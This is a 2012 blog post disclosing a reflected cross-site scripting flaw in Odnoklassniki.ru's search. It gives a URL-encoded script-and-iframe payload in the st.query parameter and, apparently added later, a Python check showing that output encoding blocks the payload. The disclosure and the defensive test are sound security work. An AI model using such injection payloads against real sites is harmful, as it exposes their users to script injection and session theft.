Sunday, 15 April 2012

Odnoklassniki.ru Cross Site Scripting

# Date: 15.04.2012
# Author: Sony and Flexxpoint
# Web Browser : Mozilla Firefox
# Sony Blog: http://st2tea.blogspot.com
# Flexxpoint Blog: http://flexxpoint.blogspot.com/
# PoC:
http://st2tea.blogspot.com/2012/04/odnoklassnikiru-cross-site-scripting.html
..................................................................
 
Well, we have a cross-site scripting issue on Odnoklassniki.ru. The payload is carried in the st.query parameter of the search URL:
 
http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E
 
or
 
http://codepad.org/kKjrrn76
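
A defender's regression check built on the PoC above, added here as an example and not part of the original post: it decodes the published st.query value and compares raw interpolation with attribute-context output encoding. The `TEMPLATE` markup and all helper names are assumptions, since the post does not show the site's actual HTML.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# PoC URL exactly as published in the post above.
POC_URL = ("http://www.odnoklassniki.ru/dk?st.cmd=appSearchResultList&st.isEmpty=off"
           "&st.query=%22%22%3E%3Cscript%3Ealert%28%22Odnoklassniki.ru%20Cross%20Site"
           "%20Scripting%22%29%3C/script%3E%3Ciframe%20src=%22http://xssed.com%22%3E")

# Hypothetical template: assumes the search term is echoed into an attribute value.
TEMPLATE = '<input name="st.query" value="{q}">'


def reflected_query(url):
    """Return the decoded st.query value a server would receive."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["st.query"][0]


def render_unsafe(q):
    """Raw interpolation: the pattern that makes reflected XSS possible."""
    return TEMPLATE.format(q=q)


def render_safe(q):
    """Contextual output encoding for an HTML attribute value."""
    return TEMPLATE.format(q=escape(q, quote=True))


class TagCollector(HTMLParser):
    """Records every element and the value attribute the parser actually sees."""
    def __init__(self):
        super().__init__()
        self.tags, self.value = [], None
    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.value = dict(attrs).get("value")


def parse(markup):
    c = TagCollector()
    c.feed(markup)
    c.close()
    return c.tags, c.value


if __name__ == "__main__":
    q = reflected_query(POC_URL)
    for render in (render_unsafe, render_safe):
        print(render.__name__, parse(render(q)))
```

With raw interpolation the parser sees three elements (input, script, iframe); with encoding it sees only the input, whose value round-trips to the original search string.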
 

2 comments:

Vitaly Kulikov said...

nice, have you more of these bugs on odnoklassniki?

Sony said...

What do you mean? How to use this? You can see in google about it.
